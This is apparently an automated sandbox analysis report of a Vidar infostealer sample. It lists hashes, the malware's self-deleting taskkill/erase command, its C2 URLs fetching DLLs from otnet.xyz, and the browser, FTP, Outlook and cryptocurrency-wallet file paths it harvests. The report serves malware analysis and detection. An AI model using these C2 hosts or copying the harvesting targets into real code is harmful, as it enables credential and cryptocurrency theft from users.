
Vidar_a85132af1b5651472eb4ad093e1bb0f5_exe.txt

paladin316 Jul 22nd, 2019 (edited) 87 Never
  1. * MalFamily: "Vidar"
  2.  
  3. * MalScore: 10.0
  4.  
  5. * File Name: "Vidar_a85132af1b5651472eb4ad093e1bb0f5.exe"
  6. * File Size: 684032
  7. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  8. * SHA256: "012e9cbd15b3e19b703a118b0fb4c48df46a505416fb629b7764178f74cd8b53"
  9. * MD5: "a85132af1b5651472eb4ad093e1bb0f5"
  10. * SHA1: "280312657d13f403527b1b3cec7e577c1e5de64b"
  11. * SHA512: "1cbe8fd4394f72a0d4a904a06447ce07eb577d5d10adb44096e38bd5ab069d3752e3dba573f38512010a118df639cddcbb78231285f1c6f6dd14c1b0ccbe42df"
  12. * CRC32: "BFC0FAFA"
  13. * SSDEEP: "12288:TEtUmRfjBeCq3SkqTJ3N4FsOevUBPqt4Ma5DG2/dIM9hbU2nv68mKQO:YKEfjB1q3Sl0mOpBCtzYVl9hQWLdQO"
  14.  
  15. * Process Execution (note: the sample ran as "Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe" rather than under the "Vidar_…" file name listed above; both names carry the same MD5, so they refer to the same binary — the family attribution remains Vidar per the MalFamily field and the ET signature further below):
  16.     "Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe",
  17.     "cmd.exe",
  18.     "taskkill.exe",
  19.     "services.exe",
  20.     "svchost.exe",
  21.     "WmiPrvSE.exe",
  22.     "taskhost.exe"
  23.  
  24.  
  25. * Executed Commands:
  26.     "C:\\Windows\\System32\\cmd.exe /c taskkill /im Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe & exit",
  27.     "C:\\Windows\\system32\\lsass.exe",
  28.     "C:\\Windows\\system32\\svchost.exe -k netsvcs",
  29.     "taskkill  /im Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe /f"
  30.  
  31.  
  32. * Signatures Detected:
  33.    
  34.         "Description": "Creates RWX memory",
  35.         "Details":
  36.    
  37.    
  38.         "Description": "A process attempted to delay the analysis task.",
  39.         "Details":
  40.            
  41.                 "Process": "WmiPrvSE.exe tried to sleep 600 seconds, actually delayed analysis time by 0 seconds"
  42.            
  43.        
  44.    
  45.    
  46.         "Description": "A process created a hidden window",
  47.         "Details":
  48.            
  49.                 "Process": "Ursnif_a85132af1b5651472eb4ad093e1bb0f5.exe -> C:\\Windows\\System32\\cmd.exe"
  50.            
  51.        
  52.    
  53.    
  54.         "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  55.         "Details":
  56.            
  57.                 "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  58.            
  59.            
  60.                 "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  61.            
  62.            
  63.                 "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  64.            
  65.            
  66.                 "suspicious_request": "http://otnet.xyz/141"
  67.            
  68.            
  69.                 "suspicious_request": "http://otnet.xyz/freebl3.dll"
  70.            
  71.            
  72.                 "suspicious_request": "http://otnet.xyz/freebl3.dll?ddosprotected=1"
  73.            
  74.            
  75.                 "suspicious_request": "http://otnet.xyz/mozglue.dll"
  76.            
  77.            
  78.                 "suspicious_request": "http://otnet.xyz/msvcp140.dll"
  79.            
  80.            
  81.                 "suspicious_request": "http://otnet.xyz/nss3.dll"
  82.            
  83.            
  84.                 "suspicious_request": "http://otnet.xyz/softokn3.dll"
  85.            
  86.            
  87.                 "suspicious_request": "http://otnet.xyz/vcruntime140.dll"
  88.            
  89.            
  90.                 "suspicious_request": "http://ip-api.com/line/"
  91.            
  92.            
  93.                 "suspicious_request": "http://otnet.xyz/"
  94.            
  95.        
  96.    
  97.    
  98.         "Description": "Performs some HTTP requests",
  99.         "Details":
  100.            
  101.                 "url": "http://otnet.xyz/141"
  102.            
  103.            
  104.                 "url": "http://otnet.xyz/freebl3.dll"
  105.            
  106.            
  107.                 "url": "http://otnet.xyz/freebl3.dll?ddosprotected=1"
  108.            
  109.            
  110.                 "url": "http://otnet.xyz/mozglue.dll"
  111.            
  112.            
  113.                 "url": "http://otnet.xyz/msvcp140.dll"
  114.            
  115.            
  116.                 "url": "http://otnet.xyz/nss3.dll"
  117.            
  118.            
  119.                 "url": "http://otnet.xyz/softokn3.dll"
  120.            
  121.            
  122.                 "url": "http://otnet.xyz/vcruntime140.dll"
  123.            
  124.            
  125.                 "url": "http://ip-api.com/line/"
  126.            
  127.            
  128.                 "url": "http://otnet.xyz/"
  129.            
  130.        
  131.    
  132.    
  133.         "Description": "Deletes its original binary from disk",
  134.         "Details":
  135.    
  136.    
  137.         "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  138.         "Details":
  139.            
  140.                 "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 11879534 times"
  141.            
  142.        
  143.    
  144.    
  145.         "Description": "Steals private information from local Internet browsers",
  146.         "Details":
  147.            
  148.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\IE_Cookies.txt"
  149.            
  150.            
  151.                 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  152.            
  153.            
  154.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Google Chrome_Default.txt"
  155.            
  156.            
  157.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Edge_Cookies.txt"
  158.            
  159.            
  160.                 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  161.            
  162.            
  163.                 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
  164.            
  165.            
  166.                 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  167.            
  168.        
  169.    
  170.    
  171.         "Description": "Collects information about installed applications",
  172.         "Details":
  173.            
  174.                 "Program": "Google Update Helper"
  175.            
  176.            
  177.                 "Program": "Microsoft Excel MUI  2013"
  178.            
  179.            
  180.                 "Program": "Microsoft Outlook MUI  2013"
  181.            
  182.            
  183.            
  184.            
  185.                 "Program": "Google Chrome"
  186.            
  187.            
  188.                 "Program": "Adobe Flash Player 29 NPAPI"
  189.            
  190.            
  191.                 "Program": "Adobe Flash Player 29 ActiveX"
  192.            
  193.            
  194.                 "Program": "Microsoft DCF MUI  2013"
  195.            
  196.            
  197.                 "Program": "Microsoft Access MUI  2013"
  198.            
  199.            
  200.                 "Program": "Microsoft Office Proofing Tools 2013 - English"
  201.            
  202.            
  203.                 "Program": "Adobe Acrobat Reader DC"
  204.            
  205.            
  206.                 "Program": "Microsoft Office Proofing Tools 2013 - Español"
  207.            
  208.            
  209.                 "Program": "Microsoft Publisher MUI  2013"
  210.            
  211.            
  212.                 "Program": "Outils de vérification linguistique 2013 de Microsoft Office - Français"
  213.            
  214.            
  215.                 "Program": "Microsoft Office Shared MUI  2013"
  216.            
  217.            
  218.                 "Program": "Microsoft Office OSM MUI  2013"
  219.            
  220.            
  221.                 "Program": "Microsoft InfoPath MUI  2013"
  222.            
  223.            
  224.                 "Program": "Microsoft Office Shared Setup Metadata MUI  2013"
  225.            
  226.            
  227.                 "Program": "Microsoft Word MUI  2013"
  228.            
  229.            
  230.                 "Program": "Microsoft Groove MUI  2013"
  231.            
  232.            
  233.            
  234.            
  235.                 "Program": "Microsoft Access Setup Metadata MUI  2013"
  236.            
  237.            
  238.                 "Program": "Microsoft Office OSM UX MUI  2013"
  239.            
  240.            
  241.                 "Program": "Java Auto Updater"
  242.            
  243.            
  244.                 "Program": "Microsoft PowerPoint MUI  2013"
  245.            
  246.            
  247.                 "Program": "Microsoft Office Professional Plus 2013"
  248.            
  249.            
  250.                 "Program": "Adobe Refresh Manager"
  251.            
  252.            
  253.                 "Program": "Microsoft Office Proofing  2013"
  254.            
  255.            
  256.                 "Program": "Microsoft Lync MUI  2013"
  257.            
  258.            
  259.            
  260.            
  261.                 "Program": "Microsoft OneNote MUI  2013"
  262.            
  263.        
  264.    
  265.    
  266.         "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  267.         "Details":
  268.    
  269.    
  270.         "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  271.         "Details":
  272.            
  273.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\*.dat"
  274.            
  275.            
  276.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\??"
  277.            
  278.            
  279.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Bitcoin\\*.*"
  280.            
  281.            
  282.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x9b\\x9e"
  283.            
  284.            
  285.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Electrum\\"
  286.            
  287.            
  288.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\default_wallet"
  289.            
  290.            
  291.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\"
  292.            
  293.            
  294.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Electrum\\*.*"
  295.            
  296.            
  297.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\"
  298.            
  299.            
  300.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Litecoin\\"
  301.            
  302.            
  303.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\*.dat"
  304.            
  305.            
  306.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Litecoin\\*.*"
  307.            
  308.            
  309.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\NameCoin\\"
  310.            
  311.            
  312.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\NameCoin\\*.*"
  313.            
  314.            
  315.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\"
  316.            
  317.            
  318.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\*.dat"
  319.            
  320.            
  321.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\*.dat"
  322.            
  323.            
  324.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\TerraCoin\\*.*"
  325.            
  326.            
  327.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\TerraCoin\\"
  328.            
  329.            
  330.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\"
  331.            
  332.            
  333.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\PrimeCoin\\"
  334.            
  335.            
  336.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\"
  337.            
  338.            
  339.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\PrimeCoin\\*.*"
  340.            
  341.            
  342.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\*.dat"
  343.            
  344.            
  345.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\*.dat"
  346.            
  347.            
  348.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FreiCoin\\"
  349.            
  350.            
  351.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\"
  352.            
  353.            
  354.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FreiCoin\\*.*"
  355.            
  356.            
  357.                 "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\"
  358.            
  359.            
  360.                 "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\*.dat"
  361.            
  362.            
  363.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DevCoin\\"
  364.            
  365.            
  366.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DevCoin\\*.*"
  367.            
  368.            
  369.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\*.dat"
  370.            
  371.            
  372.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Franko\\"
  373.            
  374.            
  375.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\"
  376.            
  377.            
  378.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Franko\\*.*"
  379.            
  380.            
  381.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\*.dat"
  382.            
  383.            
  384.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MegaCoin\\*.*"
  385.            
  386.            
  387.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MegaCoin\\"
  388.            
  389.            
  390.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\"
  391.            
  392.            
  393.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\InfiniteCoin\\"
  394.            
  395.            
  396.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\InfiniteCoin\\*.*"
  397.            
  398.            
  399.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\*.dat"
  400.            
  401.            
  402.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\"
  403.            
  404.            
  405.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IxCoin\\"
  406.            
  407.            
  408.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\"
  409.            
  410.            
  411.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IxCoin\\*.*"
  412.            
  413.            
  414.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\*.dat"
  415.            
  416.            
  417.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\"
  418.            
  419.            
  420.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\*.dat"
  421.            
  422.            
  423.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Anoncoin\\"
  424.            
  425.            
  426.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Anoncoin\\*.*"
  427.            
  428.            
  429.                 "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\*.dat"
  430.            
  431.            
  432.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\BBQCoin\\"
  433.            
  434.            
  435.                 "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\"
  436.            
  437.            
  438.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\BBQCoin\\*.*"
  439.            
  440.            
  441.                 "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\*.dat"
  442.            
  443.            
  444.                 "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\"
  445.            
  446.            
  447.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DigitalCoin\\*.*"
  448.            
  449.            
  450.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DigitalCoin\\"
  451.            
  452.            
  453.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\*.dat"
  454.            
  455.            
  456.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\"
  457.            
  458.            
  459.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MinCoin\\*.*"
  460.            
  461.            
  462.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MinCoin\\"
  463.            
  464.            
  465.                 "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\*.dat"
  466.            
  467.            
  468.                 "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\"
  469.            
  470.            
  471.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\YACoin\\"
  472.            
  473.            
  474.                 "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\*.dat"
  475.            
  476.            
  477.                 "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\"
  478.            
  479.            
  480.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\YACoin\\*.*"
  481.            
  482.            
  483.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\*.dat"
  484.            
  485.            
  486.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FlorinCoin\\"
  487.            
  488.            
  489.                 "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\"
  490.            
  491.            
  492.                 "file": "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FlorinCoin\\*.*"
  493.            
  494.        
  495.    
  496.    
  497.         "Description": "Harvests credentials from local FTP client software",
  498.         "Details":
  499.            
  500.                 "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  501.            
  502.        
  503.    
  504.    
  505.         "Description": "Harvests information related to installed instant messenger clients",
  506.         "Details":
  507.            
  508.                 "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  509.            
  510.        
  511.    
  512.    
  513.         "Description": "Harvests information related to installed mail clients",
  514.         "Details":
  515.            
  516.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003"
  517.            
  518.            
  519.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000007"
  520.            
  521.            
  522.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000006"
  523.            
  524.            
  525.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000005"
  526.            
  527.            
  528.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004"
  529.            
  530.            
  531.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000009"
  532.            
  533.            
  534.                 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000008"
  535.            
  536.        
  537.    
  538.    
  539.         "Description": "Collects information to fingerprint the system",
  540.         "Details":
  541.    
  542.    
  543.         "Description": "Created network traffic indicative of malicious activity",
  544.         "Details":
  545.            
  546.                 "signature": "ET TROJAN Vidar/Arkei Stealer Client Data Upload"
  547.            
  548.        
  549.    
  550.  
  551.  
  552. * Started Service:
  553.     "VaultSvc"
  554.  
  555.  
  556. * Mutexes:
  557.     "00000000-0000-0000-0000-0000000000003d3783a0-703a-11de-8c7a-806e6f6e6963"
  558.  
  559.  
  560. * Modified Files:
  561.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\passwords.txt",
  562.     "C:\\ProgramData\\freebl3.dll",
  563.     "C:\\ProgramData\\mozglue.dll",
  564.     "C:\\ProgramData\\msvcp140.dll",
  565.     "C:\\ProgramData\\nss3.dll",
  566.     "C:\\ProgramData\\softokn3.dll",
  567.     "C:\\ProgramData\\vcruntime140.dll",
  568.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\ld",
  569.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\historych",
  570.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\History\\Google Chrome_Default.txt",
  571.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Downloads\\Google Chrome_Default.txt",
  572.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\c",
  573.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Google Chrome_Default.txt",
  574.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\wd",
  575.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Autofill\\Google Chrome_Default.txt",
  576.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\CC\\Google Chrome_Default.txt",
  577.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Soft\\Authy\\\\xea\\x9b\\xb0\\xce\\x90\\xeb\\x82\\xa8\\xc8\\xa7\\xef\\xba\\xa0\\xc8\\xbf\\xe9\\x93\\x90\\xc8\\xb8",
  578.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\IE_Cookies.txt",
  579.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Edge_Cookies.txt",
  580.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\cookie_list.txt",
  581.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\outlook.txt",
  582.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\information.txt",
  583.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Files\\Default.zip",
  584.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x9b\\x9e",
  585.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Ethereum\\",
  586.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Electrum\\",
  587.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\ElectrumLTC\\\r",
  588.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Exodus\\",
  589.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\ElectronCash\\\r",
  590.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MultiDoge\\",
  591.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Zcash\\",
  592.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DashCore\\",
  593.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Litecoin\\",
  594.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Anoncoin\\",
  595.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\BBQCoin\\",
  596.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DevCoin\\",
  597.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\DigitalCoin\\",
  598.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FlorinCoin\\",
  599.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\Franko\\",
  600.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\FreiCoin\\",
  601.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\GoldCoinGLD\\",
  602.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\InfiniteCoin\\",
  603.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IOCoin\\",
  604.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\IxCoin\\",
  605.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MegaCoin\\",
  606.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\MinCoin\\",
  607.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\NameCoin\\",
  608.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\PrimeCoin\\",
  609.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\TerraCoin\\",
  610.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\YACoin\\",
  611.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Wallets\\JAXX\\\r",
  612.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\screenshot.jpg",
  613.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\CA_00000000-0000-0000-0000-0000000000004771908667.zip",
  614.     "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
  615.     "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
  616.  
  617.  
  618. * Deleted Files:
  619.     "C:\\ProgramData\\freebl3.dll",
  620.     "C:\\ProgramData\\mozglue.dll",
  621.     "C:\\ProgramData\\msvcp140.dll",
  622.     "C:\\ProgramData\\nss3.dll",
  623.     "C:\\ProgramData\\softokn3.dll",
  624.     "C:\\ProgramData\\vcruntime140.dll",
  625.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Autofill\\Google Chrome_Default.txt",
  626.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Autofill",
  627.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\CC\\Google Chrome_Default.txt",
  628.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\CC",
  629.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Edge_Cookies.txt",
  630.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\Google Chrome_Default.txt",
  631.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies\\IE_Cookies.txt",
  632.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Cookies",
  633.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\cookie_list.txt",
  634.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Downloads\\Google Chrome_Default.txt",
  635.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Downloads",
  636.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Files\\Default.zip",
  637.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\Files",
  638.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\History\\Google Chrome_Default.txt",
  639.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\History",
  640.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\information.txt",
  641.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\outlook.txt",
  642.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\passwords.txt",
  643.     "C:\\ProgramData\\YDVALJL4Y9QH2S7DBCEIEQ8CB\\files\\screenshot.jpg",
